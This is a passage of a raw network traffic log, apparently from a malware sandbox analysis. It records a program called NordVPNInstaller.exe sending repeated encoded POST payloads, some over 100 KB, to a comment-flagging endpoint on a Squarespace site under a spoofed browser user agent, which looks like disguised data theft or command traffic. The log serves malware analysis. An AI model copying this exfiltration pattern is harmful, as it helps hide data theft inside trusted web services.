2024-09-01 19:56:14 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:14 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQocZ_3XjEYAZDg4ZDYxMjkyYmMwODVjN2JjMGE4Yjg5YTVmY2I5; Path=/; Secure Set-Cookie: crumb=BR-ukhwjvWdCYTk3OTlmMjc0MWMxM2FlM2E4NGM4OGFkMTYwODhm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: cAln0Woz/TM8Gujao Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BR-ukhwjvWdCYTk3OTlmMjc0MWMxM2FlM2E4NGM4OGFkMTYwODhm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49758	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:15 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:15 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:15 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:15 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:15 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BW2u9ETfRN24YTlhNjlhODI3OTdiYzc2MzUwMmY0ZmM3NGMwZmU3; Path=/; Secure Set-Cookie: crumb=BVQXsTPepHpGNjExMmZiZjc4NjI2NzVhNWJjZjM2ZWQzZDhlMTZl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jAZk3FkU/3Pnf04xh Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVQXsTPepHpGNjExMmZiZjc4NjI2NzVhNWJjZjM2ZWQzZDhlMTZl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:16 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:16 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:16 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRXFPsSdPYfINzU3YzY4MjkzZDU2ZTI4ZGJhNDk4ODcxNWU4NjU5; Path=/; Secure Set-Cookie: crumb=BXgYurzHilcENGExYTg2ZjE0OTJiZjdkZjdjN2UwMzI1ZWRkNDVh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: CpamCzjE/7h6N9yzl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXgYurzHilcENGExYTg2ZjE0OTJiZjdkZjdjN2UwMzI1ZWRkNDVh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:16 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:16 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 79 52 74 78 63 62 37 50 57 64 79 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YyRtxcb7PWdyHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:16 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:16 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:16 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:16 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:16 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BReH9ELcgpCxOGMzMGZlYTgwZDQ0OWY1MjA0YzBlYzUwZDkzM2Nm; Path=/; Secure Set-Cookie: crumb=BXzBuSnSim-AYzlmYzYzMGQ0ZTRhYzA1NzdjZjA0NDNjNTdlNDFh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: wHia4EpF/n0b8AxUn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXzBuSnSim-AYzlmYzYzMGQ0ZTRhYzA1NzdjZjA0NDNjNTdlNDFh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:16 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:16 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:16 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:17 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUsqad6yZAyEYmZkNzkyOWQ4YmRiMTE2MDQ5YjZiM2Q3MmRlOTUx; Path=/; Secure Set-Cookie: crumb=BdZ5ZE9DPCcsMzEwOWQzMjU2NDg2Y2MyOWFhMzg4MjUzZDFhMWRh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Hc4tDPwo/UB50OiXx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdZ5ZE9DPCcsMzEwOWQzMjU2NDg2Y2MyOWFhMzg4MjUzZDFhMWRh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49762	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:17 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108700 Expect: 100-continue
2024-09-01 19:56:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:17 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 67 4a 31 34 37 46 66 52 4e 6a 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzgJ147FfRNj3bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:17 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:17 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 25 Data Ascii: %
2024-09-01 19:56:17 UTC	16306	OUT	Data Raw: 32 42 32 56 54 39 64 73 73 41 68 31 54 6c 41 74 31 52 33 43 6a 77 30 49 71 37 63 31 4b 63 69 64 7a 79 75 36 61 44 74 6a 68 31 5a 67 39 34 78 65 78 61 6b 4f 32 63 46 4b 49 54 72 64 6a 4c 32 70 65 64 37 56 59 44 56 46 54 77 74 67 77 49 6f 46 79 71 73 6c 71 77 6e 44 75 56 6c 4e 73 39 4f 6b 4a 50 48 6d 45 7a 6c 54 53 4b 70 4e 31 45 48 58 51 73 4d 38 32 6a 78 42 79 4c 4f 6c 71 6f 69 25 32 42 71 74 58 41 6d 4d 67 77 53 57 39 74 4a 44 63 31 45 53 66 45 56 69 58 44 5a 6d 48 4f 4a 53 6b 6b 49 6d 59 57 75 68 6e 7a 70 4e 79 74 43 47 36 7a 72 43 51 36 39 6e 78 6c 35 62 56 74 77 63 68 50 73 69 33 6c 30 61 35 49 76 49 6b 75 66 71 6c 7a 43 49 2f 72 59 34 73 48 61 47 43 67 51 70 50 52 4e 57 42 43 49 4b 32 54 50 41 64 4d 6f 43 47 6d 76 51 78 4f 76 71 64 50 56 39 79 58 32 Data Ascii: 2B2VT9dssAh1TlAt1R3Cjw0Iq7c1Kcidzyu6aDtjh1Zg94xexakO2cFKITrdjL2ped7VYDVFTwtgwIoFyqslqwnDuVlNs9OkJPHmEzlTSKpN1EHXQsM82jxByLOlqoi%2BqtXAmMgwSW9tJDc1ESfEViXDZmHOJSkkImYWuhnzpNytCG6zrCQ69nxl5bVtwchPsi3l0a5IvIkufqlzCI/rY4sHaGCgQpPRNWBCIK2TPAdMoCGmvQxOvqdPV9yX2
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 77 Data Ascii: w
